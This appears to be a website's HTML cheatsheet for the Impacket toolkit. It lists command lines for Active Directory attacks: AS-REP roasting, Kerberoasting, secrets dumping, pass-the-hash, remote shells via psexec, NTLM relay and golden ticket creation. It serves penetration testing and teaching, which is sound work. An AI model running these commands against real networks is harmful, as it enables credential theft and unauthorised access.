fraggle/WebsiteTemplate
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
6f42a58ee5
WebsiteTemplate/cheatsheets/impacket.html
Fraggle 6f42a58ee5
first commit
2026-01-25 11:33:37 -04:00

237 lines
7.9 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; style-src 'self'; font-src 'self' data:; img-src 'self' data:; connect-src 'self'; base-uri 'self'; form-action 'self' https://defcon.social https://bsky.app;">
<meta http-equiv="X-Content-Type-Options" content="nosniff">
<link rel="stylesheet" href="../assets/css/style.css">
<link rel="icon" type="image/x-icon" href="../favicon.ico">
<script>
// Apply theme immediately to prevent flash
(function() {
const theme = localStorage.getItem('theme') ||
(window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light');
document.documentElement.setAttribute('data-theme', theme);
})();
</script>
<title>impacket Cheatsheet - Cheatsheets - Launch Pad</title>
</head>
<body>
<button class="theme-toggle" id="themeToggle" aria-label="Toggle dark mode">
<svg class="theme-icon theme-icon-moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg>
<svg class="theme-icon theme-icon-sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" style="display: none;"><circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line></svg>
</button>
<br/><br/>
<div class="name">
__ _______________________ _________._________________________
\_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/
| __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_
| \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \
\___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ /
\/ \/ \/ \/ \/ \/ \/
</div>
<div class="blog-page-header">
<div class="blog-header-content">
<a href="/cheatsheets" class="back-link" title="Back to Cheatsheets">
<svg xmlns="http://www.w3.org/2000/svg" width="42" height="42" viewBox="0 0 24 24" class="home-icon"><path fill="currentColor" d="M10 20v-6h4v6h5v-8h3L12 3 2 12h3v8z"/></svg>
</a>
<h1 class="blog-page-title">impacket Cheatsheet</h1>
</div>
</div>
<div class="blog-post-container">
<div class="blog-posts-container" style="max-width: 900px; margin: 0 auto;">
<div class="blog-post">
<div class="blog-post-content">
<p><a href="index.html">← Back to cheatsheets</a></p>
<p><a href="../index.html">← Home</a></p>
<hr>
<p>Impacket is a collection of Python classes for working with network protocols. Provides tools for SMB, MSRPC, LDAP, Kerberos, and more. Essential for Windows network security testing and Active Directory exploitation.</p>
<hr>
<h2>Common Tools</h2>
<ul>
<li>GetNPUsers.py - AS-REP Roasting</li>
</ul>
<ul>
<li>GetUserSPNs.py - Kerberoasting</li>
</ul>
<ul>
<li>secretsdump.py - Dump secrets</li>
</ul>
<ul>
<li>psexec.py - Remote execution</li>
</ul>
<ul>
<li>smbclient.py - SMB client</li>
</ul>
<ul>
<li>smbserver.py - SMB server</li>
</ul>
<ul>
<li>wmiexec.py - WMI execution</li>
</ul>
<ul>
<li>atexec.py - Task scheduler execution</li>
</ul>
<ul>
<li>dcomexec.py - DCOM execution</li>
</ul>
<ul>
<li>lookupsid.py - SID enumeration</li>
</ul>
<ul>
<li>rpcdump.py - RPC endpoint dump</li>
</ul>
<ul>
<li>samrdump.py - SAM dump</li>
</ul>
<ul>
<li>ntlmrelayx.py - NTLM relay</li>
</ul>
<ul>
<li>ticketConverter.py - Convert tickets</li>
</ul>
<ul>
<li>ticketer.py - Create tickets</li>
</ul>
<hr>
<h2>AS-REP Roasting</h2>
<ul>
<li>GetNPUsers.py domain/ - List vulnerable users</li>
</ul>
<ul>
<li>GetNPUsers.py domain/user:pass - Authenticated</li>
</ul>
<ul>
<li>GetNPUsers.py -dc-ip 10.10.10.10 domain/ - Specify DC</li>
</ul>
<ul>
<li>GetNPUsers.py -request domain/ - Request tickets</li>
</ul>
<ul>
<li>GetNPUsers.py -format hashcat domain/ - Hashcat format</li>
</ul>
<hr>
<h2>Kerberoasting</h2>
<ul>
<li>GetUserSPNs.py domain/user:pass - Get SPNs</li>
</ul>
<ul>
<li>GetUserSPNs.py -dc-ip 10.10.10.10 domain/user:pass - Specify DC</li>
</ul>
<ul>
<li>GetUserSPNs.py -request domain/user:pass - Request tickets</li>
</ul>
<ul>
<li>GetUserSPNs.py -outputfile hashes.txt domain/user:pass - Save hashes</li>
</ul>
<hr>
<h2>Secrets Dumping</h2>
<ul>
<li>secretsdump.py domain/user:pass@target - Dump secrets</li>
</ul>
<ul>
<li>secretsdump.py -hashes :hash domain/user@target - Pass-the-hash</li>
</ul>
<ul>
<li>secretsdump.py -just-dc domain/user:pass@target - Domain cache</li>
</ul>
<ul>
<li>secretsdump.py -just-dc-ntlm domain/user:pass@target - NTLM only</li>
</ul>
<ul>
<li>secretsdump.py -just-dc-user user domain/user:pass@target - Specific user</li>
</ul>
<hr>
<h2>Remote Execution</h2>
<ul>
<li>psexec.py domain/user:pass@target - PsExec</li>
</ul>
<ul>
<li>wmiexec.py domain/user:pass@target - WMI execution</li>
</ul>
<ul>
<li>atexec.py domain/user:pass@target - Task scheduler</li>
</ul>
<ul>
<li>dcomexec.py domain/user:pass@target - DCOM execution</li>
</ul>
<ul>
<li>smbexec.py domain/user:pass@target - SMB execution</li>
</ul>
<hr>
<h2>SMB Operations</h2>
<ul>
<li>smbclient.py domain/user:pass@target - SMB client</li>
</ul>
<ul>
<li>smbclient.py -hashes :hash domain/user@target - Pass-the-hash</li>
</ul>
<ul>
<li>smbserver.py SHARE /path - Start SMB server</li>
</ul>
<ul>
<li>smbserver.py -username user -password pass SHARE /path - Authenticated</li>
</ul>
<hr>
<h2>Common Examples</h2>
<h3>AS-REP Roasting</h3>
<pre><code>GetNPUsers.py domain.local/ -dc-ip 10.10.10.10</code></pre>
<p>Find users with pre-auth disabled.</p>
<h3>Kerberoasting</h3>
<pre><code>GetUserSPNs.py domain.local/user:pass -request</code></pre>
<p>Request service tickets for cracking.</p>
<h3>Dump Secrets</h3>
<pre><code>secretsdump.py domain.local/user:pass@10.10.10.10</code></pre>
<p>Extract credentials from target.</p>
<h3>Pass-the-Hash</h3>
<pre><code>psexec.py -hashes :aad3b435b51404ee domain/user@target</code></pre>
<p>Authenticate with hash.</p>
<h3>Remote Shell</h3>
<pre><code>psexec.py domain/user:pass@target</code></pre>
<p>Get interactive shell.</p>
<h3>SMB Client</h3>
<pre><code>smbclient.py domain/user:pass@target</code></pre>
<p>Access SMB shares.</p>
<h3>NTLM Relay</h3>
<pre><code>ntlmrelayx.py -tf targets.txt -smb2support</code></pre>
<p>Relay NTLM authentication.</p>
<h3>Create Ticket</h3>
<pre><code>ticketer.py -nthash hash -domain-sid SID -domain domain.local administrator</code></pre>
<p>Create golden ticket.</p>
<hr>
<h2>Tips</h2>
<ul>
<li>Use GetNPUsers for AS-REP roasting</li>
</ul>
<ul>
<li>Use GetUserSPNs for Kerberoasting</li>
</ul>
<ul>
<li>secretsdump is powerful for credential extraction</li>
</ul>
<ul>
<li>Multiple execution methods available (psexec, wmiexec, etc.)</li>
</ul>
<ul>
<li>Use -hashes for pass-the-hash attacks</li>
</ul>
<ul>
<li>Essential for AD security testing</li>
</ul>
<ul>
<li>Many tools support Kerberos authentication</li>
</ul>
<ul>
<li>Check documentation for specific protocol details</li>
</ul>
</div>
</div>
</div>
</div>
<script async type="text/javascript" src="../blog/analytics.js"></script>
<script src="../theme.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink